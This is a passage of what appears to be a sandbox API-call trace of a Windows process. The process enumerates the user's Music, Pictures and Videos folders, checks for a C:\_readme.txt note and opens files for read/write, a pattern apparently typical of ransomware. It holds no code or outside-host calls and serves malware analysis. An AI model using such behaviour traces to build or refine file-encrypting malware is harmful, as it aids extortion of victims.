out: hFindFile=0x362b660) returned 1 [0165.861] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.861] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HCQjXtcJ8s9B2R_\\") returned="HCQjXtcJ8s9B2R_\\" [0165.861] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0165.861] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.861] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.861] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.861] PathFindFileNameW (pszPath="") returned="" [0165.861] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HCQjXtcJ8s9B2R_\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96272d10, ftCreationTime.dwHighDateTime=0x1d5e06b, ftLastAccessTime.dwLowDateTime=0x91faa8c0, ftLastAccessTime.dwHighDateTime=0x1d5db39, ftLastWriteTime.dwLowDateTime=0x91faa8c0, ftLastWriteTime.dwHighDateTime=0x1d5db39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.861] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96272d10, ftCreationTime.dwHighDateTime=0x1d5e06b, ftLastAccessTime.dwLowDateTime=0x91faa8c0, ftLastAccessTime.dwHighDateTime=0x1d5db39, ftLastWriteTime.dwLowDateTime=0x91faa8c0, ftLastWriteTime.dwHighDateTime=0x1d5db39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.862] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96272d10, ftCreationTime.dwHighDateTime=0x1d5e06b, ftLastAccessTime.dwLowDateTime=0x91faa8c0, ftLastAccessTime.dwHighDateTime=0x1d5db39, ftLastWriteTime.dwLowDateTime=0x91faa8c0, ftLastWriteTime.dwHighDateTime=0x1d5db39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0165.862] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.862] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.862] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\") returned="lf_1AfflQryz8itj s8w\\" [0165.862] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0165.862] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.862] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.862] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.862] PathFindFileNameW (pszPath="") returned="" [0165.862] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd480f3a0, ftCreationTime.dwHighDateTime=0x1d5dff5, ftLastAccessTime.dwLowDateTime=0xc6bc6380, ftLastAccessTime.dwHighDateTime=0x1d5e707, ftLastWriteTime.dwLowDateTime=0xc6bc6380, ftLastWriteTime.dwHighDateTime=0x1d5e707, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.862] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd480f3a0, ftCreationTime.dwHighDateTime=0x1d5dff5, ftLastAccessTime.dwLowDateTime=0xc6bc6380, ftLastAccessTime.dwHighDateTime=0x1d5e707, ftLastWriteTime.dwLowDateTime=0xc6bc6380, ftLastWriteTime.dwHighDateTime=0x1d5e707, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.862] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e502e70, ftCreationTime.dwHighDateTime=0x1d5dcac, ftLastAccessTime.dwLowDateTime=0x825b3b30, ftLastAccessTime.dwHighDateTime=0x1d5e68a, ftLastWriteTime.dwLowDateTime=0x825b3b30, ftLastWriteTime.dwHighDateTime=0x1d5e68a, nFileSizeHigh=0x0, nFileSizeLow=0x7f90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2NB5BXl v7m2B-rvdN.wav", cAlternateFileName="2NB5BX~1.WAV")) returned 1 [0165.862] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d71260, ftCreationTime.dwHighDateTime=0x1d5dfdd, ftLastAccessTime.dwLowDateTime=0xd8b96970, ftLastAccessTime.dwHighDateTime=0x1d5dd11, ftLastWriteTime.dwLowDateTime=0xd8b96970, ftLastWriteTime.dwHighDateTime=0x1d5dd11, nFileSizeHigh=0x0, nFileSizeLow=0x15eb2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OtPN87Pig3y.wav", cAlternateFileName="OTPN87~1.WAV")) returned 1 [0165.862] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3fcc2a0, ftCreationTime.dwHighDateTime=0x1d5da41, ftLastAccessTime.dwLowDateTime=0x2fb8e6d0, ftLastAccessTime.dwHighDateTime=0x1d5dec8, ftLastWriteTime.dwLowDateTime=0x2fb8e6d0, ftLastWriteTime.dwHighDateTime=0x1d5dec8, nFileSizeHigh=0x0, nFileSizeLow=0x10b9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v_kH3lt3CLNkfkofloR.mp3", cAlternateFileName="V_KH3L~1.MP3")) returned 1 [0165.862] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3fcc2a0, ftCreationTime.dwHighDateTime=0x1d5da41, ftLastAccessTime.dwLowDateTime=0x2fb8e6d0, ftLastAccessTime.dwHighDateTime=0x1d5dec8, ftLastWriteTime.dwLowDateTime=0x2fb8e6d0, ftLastWriteTime.dwHighDateTime=0x1d5dec8, nFileSizeHigh=0x0, nFileSizeLow=0x10b9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v_kH3lt3CLNkfkofloR.mp3", cAlternateFileName="V_KH3L~1.MP3")) returned 0 [0165.862] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.863] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.863] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\") returned="LV2X09A0oM561\\" [0165.863] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0165.863] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.863] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.863] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.863] PathFindFileNameW (pszPath="") returned="" [0165.863] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc64fd80, ftCreationTime.dwHighDateTime=0x1d5de29, ftLastAccessTime.dwLowDateTime=0x10c570a0, ftLastAccessTime.dwHighDateTime=0x1d5e0f2, ftLastWriteTime.dwLowDateTime=0x10c570a0, ftLastWriteTime.dwHighDateTime=0x1d5e0f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.863] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc64fd80, ftCreationTime.dwHighDateTime=0x1d5de29, ftLastAccessTime.dwLowDateTime=0x10c570a0, ftLastAccessTime.dwHighDateTime=0x1d5e0f2, ftLastWriteTime.dwLowDateTime=0x10c570a0, ftLastWriteTime.dwHighDateTime=0x1d5e0f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.863] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a983dd0, ftCreationTime.dwHighDateTime=0x1d5e70b, ftLastAccessTime.dwLowDateTime=0x5f069f70, ftLastAccessTime.dwHighDateTime=0x1d5df8d, ftLastWriteTime.dwLowDateTime=0x5f069f70, ftLastWriteTime.dwHighDateTime=0x1d5df8d, nFileSizeHigh=0x0, nFileSizeLow=0x16869, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrHO0.wav", cAlternateFileName="")) returned 1 [0165.863] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05b6f20, ftCreationTime.dwHighDateTime=0x1d5e55b, ftLastAccessTime.dwLowDateTime=0x6cbdd2e0, ftLastAccessTime.dwHighDateTime=0x1d5dc7d, ftLastWriteTime.dwLowDateTime=0x6cbdd2e0, ftLastWriteTime.dwHighDateTime=0x1d5dc7d, nFileSizeHigh=0x0, nFileSizeLow=0x5739, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RvIelPYu4g 0l9vjosa.mp3", cAlternateFileName="RVIELP~1.MP3")) returned 1 [0165.864] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.864] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.864] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\612n\\") returned="612n\\" [0165.864] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0165.864] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.864] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.864] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.864] PathFindFileNameW (pszPath="") returned="" [0165.864] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\612n\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2555e30, ftCreationTime.dwHighDateTime=0x1d5e5ba, ftLastAccessTime.dwLowDateTime=0x18dafeb0, ftLastAccessTime.dwHighDateTime=0x1d5e131, ftLastWriteTime.dwLowDateTime=0x18dafeb0, ftLastWriteTime.dwHighDateTime=0x1d5e131, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.864] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.864] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.864] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\") returned="js4wnFUoxs42X9Y0mylB\\" [0165.864] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0165.864] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.864] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.865] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.865] PathFindFileNameW (pszPath="") returned="" [0165.865] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc56cc5c0, ftCreationTime.dwHighDateTime=0x1d5e6ca, ftLastAccessTime.dwLowDateTime=0xa3742920, ftLastAccessTime.dwHighDateTime=0x1d5d98e, ftLastWriteTime.dwLowDateTime=0xa3742920, ftLastWriteTime.dwHighDateTime=0x1d5d98e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.865] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.865] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.865] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\") returned="ynvUi8OA0E 4g2YjdS\\" [0165.865] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0165.865] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.865] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.865] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.865] PathFindFileNameW (pszPath="") returned="" [0165.865] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37389b0, ftCreationTime.dwHighDateTime=0x1d5e1c8, ftLastAccessTime.dwLowDateTime=0x3e0538e0, ftLastAccessTime.dwHighDateTime=0x1d5e57d, ftLastWriteTime.dwLowDateTime=0x3e0538e0, ftLastWriteTime.dwHighDateTime=0x1d5e57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.865] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.866] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\") returned="ZyOX_xDVWOQqjcupRL\\" [0165.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0165.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.866] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.866] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.866] PathFindFileNameW (pszPath="") returned="" [0165.866] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x4bcde370, ftLastAccessTime.dwHighDateTime=0x1d5e1a7, ftLastWriteTime.dwLowDateTime=0x4bcde370, ftLastWriteTime.dwHighDateTime=0x1d5e1a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.866] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.866] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\") returned="gOI6FhRK7 r-pcVYvKd\\" [0165.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0165.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.867] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.867] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.867] PathFindFileNameW (pszPath="") returned="" [0165.867] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a3699e0, ftCreationTime.dwHighDateTime=0x1d5dc09, ftLastAccessTime.dwLowDateTime=0xa8ee3ff0, ftLastAccessTime.dwHighDateTime=0x1d5e01c, ftLastWriteTime.dwLowDateTime=0xa8ee3ff0, ftLastWriteTime.dwHighDateTime=0x1d5e01c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.867] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.867] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.867] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\") returned="V4xTSO7L1q6Ip\\" [0165.867] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0165.867] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0165.867] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0165.867] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.867] PathFindFileNameW (pszPath="") returned="" [0165.867] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fa9f050, ftCreationTime.dwHighDateTime=0x1d5e17a, ftLastAccessTime.dwLowDateTime=0xb5cca540, ftLastAccessTime.dwHighDateTime=0x1d5dbbc, ftLastWriteTime.dwLowDateTime=0xb5cca540, ftLastWriteTime.dwHighDateTime=0x1d5dbbc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.868] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.868] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.868] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.868] PathFindFileNameW (pszPath="") returned="" [0165.868] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.868] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.868] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b44498 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.869] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.869] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0165.869] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0165.869] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x362b660 [0165.870] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0165.870] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0165.870] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.871] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0165.871] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0165.871] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0165.871] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.871] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.871] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9d0 [0165.871] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.871] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.872] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.872] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b44498 [0165.872] 